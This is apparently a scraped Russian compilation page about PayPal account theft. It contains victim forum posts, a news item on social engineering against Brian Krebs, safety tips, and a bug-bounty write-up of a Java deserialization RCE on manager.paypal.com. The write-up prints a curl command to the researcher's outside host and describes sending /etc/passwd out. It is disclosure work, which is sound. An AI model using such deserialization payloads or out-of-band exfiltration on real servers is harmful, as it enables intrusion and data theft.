Взлом paypal – как уберечь свои деньги

Бусинка

Бусинка – сообщество бисерных мастеров

У нас вы можете создать бесплатное портфолио своих бисерных работ, научиться делать украшение с нуля, или задать вопрос об интересующей технике/материале

Взломали мой PayPal

  • О жизни
  • 19 декабря 2016, 09:39

22 комментария

У меня тажа ситуация произошла… У меня были проблемы с пайпалом, я задал вопрос в *официальной* группе в ВК. Вскоре мне обратилась «тех поддержка» пайпала, которая на самом деле были мошенниками… Они сказали что у меня аккаунт ограниченный и по этому не может передавать денежные средства… Мне они сразу показались подозрительными, говорили что для того что бы позволить моему аккаунту передавать деньги в Беларусь нужны ФИО, что я собственно им не сказал. Я все-же дал им шанс, а вдруг не враг. Сказали что на смс будут цифры приходить с «кодом безопасности». В общем, мне на смс начали приходить цифры от неизвестного номера (оказалось, от официального сайта PayPal… бл***, могли бы хоть сказать для чего они и от кого. ), так что подумал у них на базе данных есть сведение моего телефонного номера и процедуры позволяющие «разблокировать» аккаунт будут присылать мне на телефон, как та же муть с пайпалом и «получения диплома» которое необходимо что бы привязать кошелек к другим банкам и т.д… Подумал если это фишинг, то если скажу только эти цифры от неизвестного номера но не скажи ФИО и так далее — то мне ничего не будет, а если они и в правду из тех поддержки, то мне аккаунт апгрейдят. Даже если что и будет, то хоть оповещание о чем-то нехорошем на почту придет, но как на зло никаких писем аж 3 часа небыло. Так 3 раза они и попросили мой «security code» и оказалось, что мне напрочь пароль украли и покупку хрени на все мои 6420+ рублей сделали.

Что делать?? Произошло ночью. Даже поддержку не мог написать, пришлось новый аккаунт создавать, на тот-же СНИЛС. Надеюсь, хоть со старого аккаунта не смогут «в долг» покупать и создавать мне проценты как на кредите… Может ли техническая поддержка помочь, или надо в заявление на мошенников подавать?? Может ли заявление в полицию помочь в данной ситуации??

О жизни

Прямой эфир

Eugenia · 32 минуты назад

Eugenia · 44 минуты назад

Лучшие авторы за неделю

  • Азия +194,00
  • Ksaria +158,00
  • oksi810 +129,00
  • vlad +128,00
  • Lipka +121,00
  • Tamar +110,00
  • HULIGANKA +101,00
  • tati-ana +98,00
  • Вера +98,00
  • mambush +91,00

Все пользователи

Лучшее за месяц

tes-ov · 7 марта 2020, 10:05

Азия · 10 марта 2020, 13:23

снг · 7 марта 2020, 00:04

oksi810 · 11 марта 2020, 10:22

kedr · 7 марта 2020, 10:12

Азия · 10 марта 2020, 14:22

moonperl · 8 марта 2020, 13:38

Вера · 7 марта 2020, 11:23

Бусинка

Бусинка – проект, посвященный бисеру и бисерному рукоделию. Наши пользователи – начинающие бисерщики, которые нуждаются в подсказках и поддержке, и опытные мастера, которые не мыслят своей жизни без творчества. Сообщество будет полезно каждому, у кого в бисерном магазине возникает непреодолимое желание потратить всю зарплату на пакетики вожделенных бусинок, страз, красивых камней и компонентов Swarovski.

Мы научим вас плести совсем простенькие украшения, и поможем разобраться в тонкостях создания настоящих шедевров. У нас вы найдете схемы, мастер-классы, видео-уроки, а также сможете напрямую спросить совета у известных бисерных мастеров.

Вы умеете создавать красивые вещи из бисера, бусин и камней, и у вас солидная школа учеников? Вчера вы купили первый пакетик бисера, и теперь хотите сплести фенечку? А может, вы – руководитель солидного печатного издания, посвященного бисеру? Вы все нужны нам!

Пишите, рассказывайте о себе и своих работах, комментируйте записи, выражайте мнение, делитесь приемами и хитростями при создании очередного шедевра, обменивайтесь впечатлениями. Вместе мы найдем ответы на любые вопросы, связанные с бисером и бисерным искусством.

Взломать PayPal за 73 секунды

Детали уязвимости

При тестировании безопасности сайта manager.paypal.com в burp suite мое внимание привлек необычный параметр “oldFormData”, который выглядел как сложный Java-объект, закодированный в base64:

В шестнадцатеричном виде он начинался с сигнатуры «aced 0005», по которой я понял, что это сериализованный Java-объект класса “java.util.HashMap” без какой-либо цифровой подписи. Это означало, что при отправке формы мы могли подменить его на объект совершенно другого класса — и на сервере будет вызван метод “readObject” (или “readResolve”) нового класса.

Для эксплуатации мне необходимо было найти в исходниках приложения (или в библиотеках, которые оно использует) класс, который имеет что-то интересное в методе readObject или readResolve, например создание файла или исполнения системной команды с параметрами, на которые мы можем влиять.

К счастью, Chris Frohoff (@frohoff) и Gabriel Lawrence (@gebl) в начале 2015 года проделали отличную работу и нашли цепочку подходящих классов в библиотеке Commons Collections. Они также выпустили утилиту ysoserial для генерации подходящих сериализованных объектов, которые в результате приводят к выполнению произвольного кода в методе readObject.

Эксплойт

Я немедленно скачал эту утилиту с их проекта на github и сгенерировал объект класса «sun.reflect.annotation.AnnotationInvocationHandler», десериализация которого приводит к выполнению команды «curl x.s.artsploit.com/paypal», если на сервере доступна библиотека Commons Collections.

Выполнение команды curl отсылает на мой собственный внешний сервер запросы по протоколам DNS и HTTP, что хорошо для выявления так называемых слепых уязвимостей, при которых результат выполнения команды не выводится в ответе сервера.

После этого я отправил полученный закодированный объект на сервер в параметре “oldFormData” и буквально не поверил своим глазам, когда в логе доступа на моем Nginx высветилась строчка:

Адрес 173.0.81.65 принадлежал компании PayPal и в этот момент я понял, что могу выполнять произвольные команды на серверах сайта manager.paypal.com.

Я мог бы загрузить бекдор, получить доступ к базам данных, которые использует приложение, или побродить по внутренней сети. Вместо этого я лишь прочитал файл “/etc/passwd” отослав его на свой сервер как подтверждение уязвимости:

Я также записал видео, как воспроизвести эту уязвимость, и отправил всю информацию в PayPal.

Ответ от PayPal

После получения отчета в PayPal быстро пофиксили уязвимость и запросили у меня мой внешний IP-адрес, с которого я проводил тестирование, для проведения внутреннего расследования. Примерно через месяц PayPal назначили мне награду за найденную уязвимость, хотя баг в их системе числился как дубликат. Насколько я понял, другой исследователь, Mark Litchfield, также отправил им информацию о похожей уязвимости 11 декабря 2015 года, за два дня до моего отчета.

В любом случае PayPal выплатили мне хорошее денежное вознаграждение, за что им большое спасибо.

Видео:

  • Скопировать ссылку
  • Facebook
  • Twitter
  • ВКонтакте
  • Telegram
  • Pocket

Похожие публикации

  • 3 марта 2016 в 16:39

Теория и практика парсинга исходников с помощью ANTLR и Roslyn

Новые доклады на PHDays III: от безопасности АСУ ТП до анализа эксплойтов нулевого дня в Java

Руководство по выстраиванию звезд: kernel pool spraying и VMware CVE-2013-2406

Вакансии компании Positive Technologies

Комментарии 30

на сервере будет вызван метод “readObject” (или “readResolve”) нового класса

Мало с этим работал, каюсь. Но все равно не очень понятно, почему так.

Я все время себе представлял сериализацию/десереализацию как простое преобразование в формат, удобный для хранения. Я допускаю, что в Java реализован механизм, при котором каждый класс может определить свой метод сериализации/десериализации, который будет наиболее удобен для хранения данных экземпляра этого класса. Понятно, что этот метод будет вызываться при десериализации.

Но не понимаю, как получается на базе этого провести атаку. Сервер не проверяет подпись => мы можем загрузить экземпляр класса любого типа => мы загружаем экземпляр класса заданного типа, который позволяет выполнить произвольную команду при вызове метода readObject — так, что ли?

Еще более непонятно, в чем отличие варианта, когда сервер проверяет подпись. Если файл динамически генерируется и подписывается клиентом, то что помешает злоумышленнику точно так же подписать свой класс с вредоносной нагрузкой и отправить его на сервер?

Что-то я не врубаюсь.)

Вы правильно рассуждаете

В коде приложения десериализация выглядит примерно так:

При этом имя класса у которого будет вызван readObject хранится в байтах самого сериализованного объекта, который мы можем подделать, а преобразование к нужному экземпляру класса(MyClass) происходит уже после вызова readObject.

В классе sun.reflect.annotation.AnnotationInvocationHandler, который я использовал, как раз в методе readObject содержится нужная мне последовательность действий, приводящая к выполнению произвольного кода.

>Еще более непонятно, в чем отличие варианта, когда сервер проверяет подпись. Если файл динамически генерируется и подписывается >клиентом, то что помешает злоумышленнику точно так же подписать свой класс с вредоносной нагрузкой и отправить его на сервер?

Объект проходит сериализацию/десериализацию только на сервере, поэтому подпись тоже должна выполняться только на сервере. Либо можно хранить сериализованные объекты в сессии, а не принимать их от клиента через Post/Get параметры.

Спасибо за ответ. А можно еще три вопроса?)

1. Понятно, что нагрузка выполняется во время вызова метода readObject() . А что случится при попытке приведения внедренного злоумышленником объекта к классу MyClass? Получается, здесь может вылететь Exception, если десериализованный объект не удастся привести к типу MyСlass?

2. Все равно не могу осознать часть про подпись.

Объект проходит сериализацию/десериализацию только на сервере

Мне все время казалось, что в данном случае главный смысл сериализации — это преобразование объектов в форму, удобную для передачи по сети клиенту. То есть клиент проводит какие-то расчеты/операции, записывает результаты в экземпляр класса и отправляет сгенерированный/модифицированный объект на сервер.
Если подписать объект на сервере, а потом переслать клиенту, то мы гарантируем подлинность объекта, но лишаем при этом клиента возможности как-то модифицировать объект (меняется объект => меняется подпись). А в чем смысл передавать на клиент неизменяемые объекты?

3. Также непонятно, почему хранение объектов в сессии обезопасит схему. Клиент же должен иметь возможность модифицировать объект для отправки данных на сервер!

Единственный вариант, который позволяет мне объяснить происходящее, такой: в серверном приложении PayPal есть класс, который используется этим приложением (и только им). Для каждой пользовательской сессии генерируется свой экземпляр такого класса, но клиент не изменяет этот объект напрямую — всю обработку ведет серверное приложение. И несмотря на то, что клиенту абсолютно не нужен доступ к этому экземпляру класса, разработчики PayPal решили хранить этот объект в качестве одного из параметров запроса.
Такой вариант вроде бы объясняет происходящее, но…

Получается, здесь может вылететь Exception, если десериализованный объект не удастся привести к типу MyСlass?

> если подписывать на сервере, то клиент не сможет объект менять. На хрена бы клиенту неизменяемый объект?)

В PayPal и не подразумевалось что клиент будет менять этот объект. Там на клиенте только html/js и с помощью них менять сериализованный объект Java было бы странно. Объект использовался только для сохранения состояния клиента, что по моему скромному мнению может быть и должно быть сохранено в сессии.

Читайте также:  Ошибки в PayPal - как исправить

> если подписывать на клиенте, то клиент сможет объект менять, как хочет. На хрена бы нужна такая подпись?)

В этом случае подпись действительно не нужна, если очень хочется использовать сериализацию в общении java -> java, то можно ограничить список классов, которые могут быть сериализованы написанием своего ObjectInputStream. Некоторые просто советуют удалить класс из Commons Collections который приводит к RCE, но мне не кажется что это лучшее решение.

Объект использовался только для сохранения состояния клиента, что по моему скромному мнению может быть и должно быть сохранено в сессии

Проектировщики могли хотеть сделать сессию по максимуму stateless для облегчения масштабируемости и нагрузочной балансируемости. В сессии могут хранить только полномочия, а всё, связанное с текущими совершаемыми операциями — передавать через клиентскую сторону.

В 2001-2003 я сидел на одном форуме, движок которого работал даже на броузерах без поддержки cookies — там идентификатор сессии передавался в виде get-параметра (при том, что текст сообщения передавался, как и надо, через post).

Все правильно… Шифровать или подписывать реквест, там где ожидается untrusted data (к примеру в том же браузерном приложении) не имеет большого смысла… От слова совсем. Это — моветон и даже в случае использования закрытого кода, это, как минимум, security through obscurity.

В «нормальном» приложении должно быть просто тупо программно запрещено десериализовывать unsafe объекты. Точка. Без вариантов, независимо от того на чем бегает servlet runner, хоть java, хоть ruby, хоть любимое подставить что там тикает внутри.

Как правило, десериализуется напрямую только что-нибудь вида SomeSafeObject, с переписанным Serializable, readObject и иже с ними, где все неожиданные для этого класса объекты в потоке бросают java.io.IOException(“Cannot be deserialized”); .
Еще лучше если десериализуется что-то «примитивное» вида SomeSafeConfigObject и только затем уже собирается SomeObject.

Ну или если совсем уж лень, хотя бы что-нибудь с white-list по классам, тупо запрещающее все другие классы, кроме тех что в белом списке. Для java в качестве примера нашел на скорую руку SerialKiller: Look-Ahead Java Deserialization Library (только не пользуйте black-list ну или если никуда, то с умом, и лучше все же с white-list).

Тот же кто делает тупо такое (см ниже) с untrusted data, стреляет себе же в ногу:

Потому что, оно тупо сперва выполнит все что «хакер прописал», а только потом скастит это в MyObject (или упадет с чем-нибудь вида ClassCastException).

Причем использование песочниц, safe interpreter, и т.п. не делают процесс десериализации не легче, не безопаснее (не ожидаемый видоизмененный поток — грязная zip-бомба, переполнение буфера, стэка, и т.п. прелести). Не нужно недооценивать «криминальный» потенциал и креатив…

Как-то раз, было дело, поломал один сервер (даже кластер), тупо получив доступ только к одному разделу SQL, но в котором сериализовались объекты сессии — как результат через малое время «сдался» уже весь сервер. Я к тому, что если допустим какой-то SQL не за шлюзами, но сериализованые там объекты, по сути тот же untrusted data (я утрирую).

По сабжу же — от paypal честно не ожидал (рука-лицо) — настолько это непрофессионально. Artsploit зачет и уважуха…

Мошенники взломали Pay Pal

Недавно произошла такая ситуация – у меня пополнился баланс PAY PAL на сумму 50 долларов и через несколько часов ночью вся сумма ушла в неизвестном направлении. Причем перечисления происодили равными суммами по 500 р. Я позвонила в службу PAY PAL Россия (работают с 10:00 – 20:00 с пон по пят) и там буквально за 7-8 часов вернули мне деньги! Оказалось, что кто-то получил доступ в мой эккаунт, привязал свой емейл и вывел эти деньги. Радует, что PAY PAL быстро разбирается с этими вопросами. Занятно, что за неделю до этого вскрыли мою карту VISA Сбербанк и украли 3000 р – но от банка уже 3 недели ни слуу ни дуxу.

Да Вас взломали, .

как побывавший в такой ситуации – срочно менять все и везде доступы-пароли, иначе процесс повторится.

Олег поменяла карту VISA и пароли от PAY PAL – больше не знаю что менять))

Менять, как минимум, пароли на все почтовые ящики, особенно те, к которым привязано хоть что-то денежное (ПейПал, вебмани, яндексденьги). И также менять контрольные вопросы на этих ящиках.

Катерина это я сделала да – у меня мысль может в компьютере (у меня МАК) сидит вирус – или такого быть не может в принципе..

Программ, ворующих пароли, великое множество, так что комп проверить не помешает.

могу только поделиться своими действиями.

РР к сожалению является площадкой для мошенников очень “продвинутых”, мне долго объясняли, и то что я понял – . в такой ситуации Вы уже оказались в базе для жуликов, попытки будут продолжаться, менять:

– банк (как минимум карту)

– пароли и доступы во все соц.сети, почт ящики, и особо . удаленные доступы в банки

– в самом РР новая авторизация

– усложнить пароли (но без фанатизма) а то сам не войдешь

– завести для расчетов в сети отдельную карту, при необходимости ее пополнять

– никогда не принимать деньги происхождения которых Вы не знаете

. но все это ничего не гарантирует уж больно все завязано и при сильном желании.

Олег очень понравился Ваш пункт про отдельную карту – просто супер идея. завтра оформлю какой-нибудь моментум !!

Не выдают больше моментумов, мы уже спрашивали. Говорят, защита у них была слабая, проблем было много.

Как мне обьяснил человек, преподающий в институте защиту компьютерной информации ” Агент “мэйл ру” это дыра,в которую уходит информация , особенно при плохой антивирусной защите” .Производя оплату картой за новый антивирус, он просто удалил программу, а потом установил вновь.В любом случае надо выходить из всех соцсетей и т.п , а после оплаты вновь входить.

Марина спаисбо за информацию! Я вот тут читала на форумаx и никак не могу понять как устанавливать антивирус на макинтош – пишут как будто на таки компаx вирусов вообще не может быть – изучаю вопрос антивирусов.

Марина, не знаю, раньше считалось, что для маков вирусов нет, сейчас – сомневаюсь. Во всяком случае, на работе у нас на маки установили антивирусы. Касперский, кажется, тоже теперь предлагает версию для них.

“В любом случае надо выходить из всех соцсетей и т.п , а после оплаты вновь входить”

Ещё свет в комнате выключать что ж только не напридумывают. Это как сидя в очереди к врачу, слушать рекомендации от таких же пациентов, которые так же сидят в очереди на приём.

Если открыли страничку с вирус, то он уже в компе, закрывать -открывать окна в браузере не имеет никакого практического смысла.

Минимум, хороший антивирус должен быть, неплохо позаботиться бы о лицензионном ПО.

Мифы о неуязвимости мака тоже не стоит слушать.

Елена Вы вселили в меня надежду!! скажите, сколько времени примерно заняло рассмотрение заявки?

неа -пока нет уже 3-я неделя идет! PAY PAL деньги вернул, а сбербанк с карты виза нет

Татьяна а сколько по времени Вы ждете?

Год, приеду в нижний-в суд подам, ссылаются, что нет заявлений об отключении телефона от мобильного банка, а это было 3 года назад, при этом операционисты мне говорили, что подключен только 1 телефон, а того нет в списках- только руководитель подразделения сказал, что оказываются операционисты не видят телефоны, подключен ныне через банкометы.

но это было до вступления закона в силу, сейчас вообще то они должны вам вернуть средства незамедлительно, а потом уже разбираться- обратитесь в защиту прав потребителей

ничего себе!! обращусь) спасибо!!

Татьяна а ссылку на закон не дадите или как он называется примерно?

Неплохой такой источник дохода для банка, в случае, если он захочет им воспользоваться – все карты на руках)))

Тоже было с Pay Palom, якобы я где-то что-то купила на 100 долл, но все вернули. Тоже сменила пароли/явки, но еще совет, если начинают сильно подвисать программы, сразу чистите браузер/куки и выходите отовсюду. Может это паранойя, но прежде чем, меня взломали, все сильно висло. Ах, да, сначала был взлом в соц.сетях, а потом и карты, думаю это тоже взаимосвязанно.

Если угнали аккаунт от палки, это значит что получили доступ к компу, то есть, он наравне с вами может, и, скорее всего, скрыто наблюдать и наблюдает до сих пор, чем вы занимаетесь на компе, в связке с кейлогерами, то есть получает при желании всё, что вы набираете с клавиатуры. Лучше сдержаться от покупки с оплатой банковской картой на сайтах с сомнительной защитой. Использовать виртуальную клавиатуру для ввода личных данных при покупке с банковской карты. Лучше проверить свой компьютер, чем скорее, тем лучше.

Со сбера угнать деньги на сбер маловероятно, т.к подтверждение нужно, хотя если у вас там кругленькая сумма, то есть сервисы которые восстанавливают ваш номер и получают смс подтверждение))) Скорее что-то проплачивают или на мобильный сливают, а оттуда уже на карту, привязанная киви, к примеру, вывод мгновенный))

Виртуальная машина поможет и лазить на сомнительных сайтах, качать сомнительные программы туда. VirtualBox

ОГО! Аж мурашки по коже))

У нас так с Киви получилось. подставной лист с сайтом и немного не внимательности. пришла смс с просьбой подтвердить вход по смс паролю. – подтвердила – в это время был сделан отказ от смс оповещений, а после сняты средства. ну а на сайт я так типа и не попала. типа зависло. По совету друзей сходили в полицию написали заявление.

В результате теперь знаю что и Киви мошенники и Билайн. Похоже взаимосвязаны. Билайн направо – налево штампует номера и отдает их без регистрации, а Киви регистрирует только по номеру телефона – и оппа – найти никого не возможно! У нас в городе весь Спайс оплачивают через Киви. и развелось автоматов немереннно.

Служба поддержки Киви ждала заключение полиции, где нам было сказано что преступления типа и нет. А мои ссылки на поддельную страницу игнорировали, через 2 недели сделали новую такую же. с другим адресом.

PayPal Брайана Кребса взломали дважды и попытались перевести деньги террористу ДАИШ

Xakep #250. Погружение в AD

В канун Рождества неизвестные хакеры преподнесли Брайану Кребсу очень своеобразный подарок: злоумышленники сумели дважды скомпрометировать его PayPal аккаунт и попытались перевести деньги террористу ДАИШ. Однако известный журналист и исследователь пострадал не в результате взлома, просто работа службы поддержки PayPal оставляет желать лучшего.

Читайте также:  Яндекс.Деньги в долларах: перевод валюты

Имя Брайана Кребса (Brian Krebs) хорошо известно как в среде специалистов в области информационной безопасности, так и в хакерских кругах. Бывший журналист The Washington Post многие годы специализируется на проведении частных расследований, а затем изобличает в своем блоге хакерские группы и отдельных индивидов, распутывает сложнейшие схемы атак и пишет о том, о чем другие предпочитают помалкивать.

Кребсу регулярно угрожают, и его не раз пытались подставить. К примеру, однажды журналисту домой прислали наркотики, купленные в даркнете. Хакерский андеграунд имеет на Кребса большой зуб и время от времени пытается ему отомстить. Из-за этого практически любые личные данные Брайана Кребса можно легко найти в сети, — за информацией о нем охотились прицельно.

Очередную месть обиженные хакеры осуществили в канун Рождества. Злоумышленники сумели дважды перехватить управление над PayPal аккаунтом Брайана Кребса, и виной тому – халатность специалистов технической поддержки платежной системы.

«Атакующим понадобилось просто позвонить в поддержку PayPal и притвориться мной, продиктовав оператору последние четыре цифры номера социального страхования и последние четыре цифры номера моей старой банковской карты. И для них сбросили пароль», — пишет Брайан Кребс в блоге Krebs on security.

Таким образом хакеры сумели изменить email аккаунта Кребса на собственный, о чем журналист узнал, получив уведомление по почте. Кребс отреагировал оперативно – он сразу же залогинился в PayPal с древнего компьютера, сменил пароль, вернул свой email-адрес на место и удалил почту злоумышленников.

Затем Кребс связался с PayPal и поинтересовался у сотрудника службы поддержки, каким образом злоумышленники смогли провернуть такое, а также спросил, какие шаги ему следует предпринять дальше. Сотрудник службы поддержки ответил, что атакующие проникли в аккаунт, использовав легитимные логин и пароль Кребса, а также заверил журналиста, что он уже сделал всё, что мог. Кроме того, специалист пообещал, что компания будет фиксировать любую подозрительную активность, связанную с аккаунтом Кребса, так что тот может расслабиться.

Полчаса спустя Кребс вновь проверил почту и обнаружил, что тот же самый email снова сделали адресом по умолчанию для его PayPal аккаунта. К сожалению, на этот раз сообщение застало журналиста вне дома. К тому времени, когда Кребс добрался до компьютера, злоумышленники успели поменять пароль и удалили его настоящий email вообще.

«Вот он — обещанный мониторинг подозрительной активности от PayPal, — пишет Кребс. — Компания даже не заметила, что email-адрес мошенников был добавлен к аккаунту второй раз».

Вскоре после этого аккаунт Кребса был заблокирован. Дело в том, что атакующие якобы попытались скомпрометировать журналиста и предприняли попытку перевести некую сумму на счет британца Джунаида Хусейна (Junaid Hussain). Хусейн aka TriCk был экспертом в области информационной безопасности и горячо поддерживал запрещенную на территории РФ организацию ДАИШ. Предположительно, именно Хусейн был основателем хакерской группы «Киберхалифат». Также он подозревался во взломе твиттера Пентагона, а в 2012 году отсидел полгода за взлом адресной книги премьер министра Великобритании (тогда этот пост занимал Тони Блэр). В августе текущего года хакер был ликвидирован американским беспилотником где-то на севере Сирии.

Джунаид Хусейн

Кребс вновь связался с PayPal, но на этот раз настоял на разговоре с кем-нибудь, рангом выше обычного сотрудника технической поддержки. Супервайзер, с которым соединили Кребса, подтвердил то, о чем уже догадался сам журналист: злоумышленники не взламывали его длинный и сложный пароль, они задействовали примитивную социальную инженерию и дважды звонили в службу поддержки, представляясь Кребсом. Так как хакеры располагали информацией о номере социального страхования журналиста и номерах его банковских карт, никаких проблем у них не возникло.

В ходе беседы, Кребс поинтересовался у сотрудника компании, почему PayPal фактически не защищает своих пользователей и не может, к примеру, присылать SMS с кодом подтверждения на телефон, или генерировать такой код посредством мобильного приложения. Сотрудник ответил, что компания не располагает технологиями мобильной аутентификации, но в таких случаях может предложить клиенту, сделать фотокопию или скан водительских прав и прислать этот документ по почте. Нет, не по электронной.

В блоге Кребс отмечает, что с таким подходом PayPal застряла где-то в прошлом веке и, очевидно, не знает о том, что существует множество сервисов, при помощи которых можно с легкостью подделать сканы любых документов, включая водительские права, паспорта, банковскую информацию и так далее.

Хотя PayPal предлагает своим клиентам специальные аппаратные токены для защиты аккаунтов, это едва ли помогает. «Токены безопасности вряд ли приносят PayPal какую-то пользу, если одновременно с этим компания позволяет ворам сбрасывать пароли по телефону, просто используя четыре последние цифры номера социального страхования», — пишет Кребс.

Фото: Daniel Rosenbaum/New York Times

Как обезопасить себя используя PayPal или eBay: основы безопасности

–> Рекомендуем прочитать: «Мошенники на eBay : как не стать жертвой обмана»

Как говорится, свято место пусто не бывает. Аукцион eBay и платежная система PayPal притягивают к себе как магнитом всех тех, кто ищет легкой наживы, стараясь обмануть честных пользователей. Хоть эти компании и уделяют значительное количество средств и времени на улучшения своих систем безопасность, но всегда находятся способы выудить у пользователей eBay и PayPalочередную сотню долларов. Спасение утопающего – дело рук самого утопающего, и это нужно понимать. Если вы будете с легкостью давать себя обмануть, то никакие системы защиты eBay и PayPal Вам непомогут.

В данной статье мы поговорим о том, как обезопасить себя, на что стоит обратить внимание в первую очередь, работая с PayPal или eBay. Расскажем о типаже мошенников, об их поведении, об основных способах украсть ваши персональные данные.

А за чем же охотятся интернет злодеи? В первую очередь – это ваши логины и пароли от платежной системы, либо же от персональной страницы на аукционе. Получив доступ к аккаунту PayPal, мошенники могут за считанные секунды вывести все деньги с привязанной к PayPal карте, оставив Вас с нулевым счетом, или, что еще хуже, загнав в кредитный долг перед банков. Получив доступы на eBay, мошенники могут воспользоваться вашей репутацией. Как правило, они выставляют товар на продажу по низкой цене, получают сотни проплат и… и больше не выходят на связь. Даже если вы и восстановите доступ к учетной записи, то получите множество проблем и разбирательств как с разгневанными покупателями, так и с администрацией аукциона.

Рекомендуем прочитать: «Дорогая «халява» или способы обмана в интернете»

Существует огромное количество способов завладеть вашими персональными данными. Для начала нужно знать и помнить две основные вещи:

  • Ни администрация платежной система, ни администрация аукциона eBay никогда не попросит Вас сказать свои логин и пароль. Чтоб там не случилось: зависла система, произошел сбой, велись технические работы или что-то в этом роде, им не понадобятся ваши данные для входа в систему. Все подобные запросы – чистой воды мошенничество, которое рассчитано на новичков, либо на простофиль. Многие игнорируются такие сообщения, и правильно делают, но находятся и такие, кто верит в них, и потом получает огромное количество проблем.
  • Часто мошенники присылают письма на электронные почты, которые визуально очень схожи с теми, которые присылает PayPal либо eBay. В них говориться о том, что Ваш аккаунт взломали, либо он заблокирован. Для восстановления доступа нужно перейти на какой-то сайт и авторизироваться используя свой логин и пароль от платежной системы, либо от аукциона. После этого ничего не произойдет, но ваши данные уже попадут в руки мошенников. Никогда не переходите на какие-то иные сайты кроме официальных. Также все уведомления, приходящие на почту, дублируются в личных сообщениях на сайте.

Отдельного внимания заслуживает защита от различных шпионских программ и вирусов.

Основы безопасности на PayPal и eBay – особое внимание компьютерным вирусам

Если способы заполучения персональных данных описанные выше рассчитаны на невнимательных и доверчивых пользователей сети интернет, то компьютерный вирус может подхватить каждый. И тут уже нет разницы – опытный вы пользователь сети, или же только начинающий. Вирусы, черви, различные троянские программы подвергают опасности всех, не различая ни пола, ни возраста, ни социального статуса. Их основная цель – заразить как можно больше машин, и получить доступ к аккаунтам большего числа пользователей PayPal и eBay.

Рекомендуем прочитать: «СЕО мифы – как не попасть на удочку обманщиков»

С каждым днем вирусы становятся все более и более изощренными. Только антивирусные программы научились распознавать и нейтрализовать один вид угрозы, как сразу же появляется иной, менее чувствительный и более скрытный. Вирус можно заполучить из различных источников: посещая непроверенные и сомнительные сайты, читая спам почту, пользуясь общественными сетями и носителями информации. Хакеры, создающие различные шпионские программы, тоже не дураки. Они делают их таким образом, чтоб те работали на вашем компьютере практически не заметно. Вирус не будет грузить систему, не будет использовать ее ресурсы, будет потреблять минимум трафика интернете. Вы можете даже и не знать, что в вашем компьютере «живет непрошенный гость», который сливает всю информацию на сервер мошенника.

Есть более жесткие вирусы, которые действуют как группа захвата. Попав на компьютер, они копируют все данные, получают необходимую информацию, а потом могут повредить систему, либо же стереть часть жесткого диска. И пока вы будете восстанавливать последствия такой диверсии, на что может уйти от нескольких часов до нескольких дней, злоумышленники будут использовать все ваши данные, и, возможно, ваши деньги.

Вирусы могут наделать немало бед, и все мы это понимает. Цель данной статье – не напугать Вас, и не повторить в сотый раз как опасны шпионские программы, а дать советы как защититься от подобного рода проблем при использовании различных интернет магазинов и платежных систем.

Кто же стает жертвами вирусов?

Как мы уже писали выше, спасение утопающего – это дело рук самого утопающего. Платежные системы, интернет магазины, онлайн аукционы каждый раз усовершенствуют свои системы защиты данных пользователей. НО если пользователь сам невнимателен, и допускает глупости при пользовании сети интернет, то тут уже ничто не поможет. Как правило, больший риск подвергнуться атаке вирусов тех, кто вообще не пользуется никакими антивирусными программами. Да-да, вы все правильно прочитали. Есть еще достаточное количество таких юзеров, которые вообще не обращают на это внимание. Что тут сказать? Нет слов.

Рекомендуем прочитать: «Refurbished товары: стоит ли их покупать или нет?»

Также очень сильно рискуют те, кто использует нелицензионные программы, либо взломанные хакерами. Часто взломанный антивирус имеет какую-то уязвимость. Именно ее и используют мошенники, и через эту дыру попадают на ваш компьютер. Поэтому, если хотите быть уверенным, что Ваш антивирус Вас защищает, а не создает дополнительные проблемы, то не качайте его с сомнительных сайтов.

Читайте также:  Webmoney в Беларуси - вход в кошелек, аттестация и оплата

Страдают и те, кто ищет в сети различные ключи к своим антивирусам, программы для взлома лицензии и т.д. Часто мошенники создают сайты и продвигают их именно по запросам типа «ключи к антивирусу», «кряк для антивируса», «взломать антивирус». В надежде найти хорошую защиту для своего компьютера, вы заходите на один из таких сайтов. Результат получается прямо противоположным – вирус уверенно и на долго селится в вашей системе.

Правда и те, кто имеет хороший антивирус, не всегда застрахован от проблем. Не стоит забывать, что ежедневно в сети появляются тысячи новых вредоносных программ, и чтоб с ними успешно бороться нужно обновлять свой антивирус.

Вам кажется, что мы нагнали страху, рассказав о возможных последствиях вирусной атаки — но, к сожалению, последствия могут быть еще хуже. Порча компьютерного «железа», безвозвратная потеря ценных данных и многое другое…

Надежный антивирус – основа вашей защиты

Как мы уже говорили выше, ежедневно в сети появляются десятки, а то и сотни новых шпионских программ, вредоносных утилит и вирусов, которые, в первую очередь, направлены на похищение ваших персональных данных. Как бы это было не печально, но статистика гласит, что каждый год кибер преступники похищают миллионы долларов с кредитных карт пользователей различных интернет магазинов. На 100% обезопасить себя вы вряд ли сможете, но снизить риски до минимума вполне реально. Для этого нужно придерживаться нескольких простых правил:

  • Не посещать сомнительные сайты, и сайт содержащие запрещенный контент. Очень часто поисковые систему и браузеры предупреждают о том, что на сайте может находиться угроза для вашего компьютера. Если вы на 101% не уверены в безопасности такого интернет ресурса, то лучше не заходите на него.
Рекомендуем прочитать: «Как не купить подделку на eBay: наши советы и рекомендации»

  • Не скачивайте пиратский программы, либо же те, которые были взломаны. Конечно, в сети есть множество бесплатных утилит, и относительно бесплатных, но ища их вы рискуете наткнуться на множество сайтов, цель которых инфицировать Ваш компьютер. Без крайней необходимости советуем не пользоваться «ломаными» программами.
  • По возможности используйте оригинальные версии операционных система для вашего персонального компьютера. Плюсом лицензии является то, что вы будете регулярно получать обновления, которые закрывают дыры и уязвимости через которые проникают вирусы на сайт.
  • Не открывайте свободный доступ к папкам и файлам на вашем компьютере.
  • Пользуйтесь лицензионными антивирусами и фаерволами.

Помните, что eBay и PayPal особо привлекают различного рода мошенников. Это и понятно, ведь в данных системах ежедневно крутятся миллионы долларов, и каждый норовит урвать свой «бесплатный» кусок чужих денег. На форумах и специализированных блогах ежедневно появляются десятки просьб о помощи от тех, чьи компьютеры были инфицированы и кошельки очищены под самый ноль. Долгая переписка с администрацией PayPal или eBay, бессонные ночи, куча потраченного времени и нервов – и в результате, вы можете вернуть свои деньги. Но это еще не факт. А можно просто побеспокоиться о собственной защите заранее, и спокойно, без лишней суеты и боязни, использовать всевозможные интернет магазины, платежные системы, и онлайн аукционы.

Рекомендуем прочитать: «Отзывы на eBay – ответы на часто задаваемые вопросы»

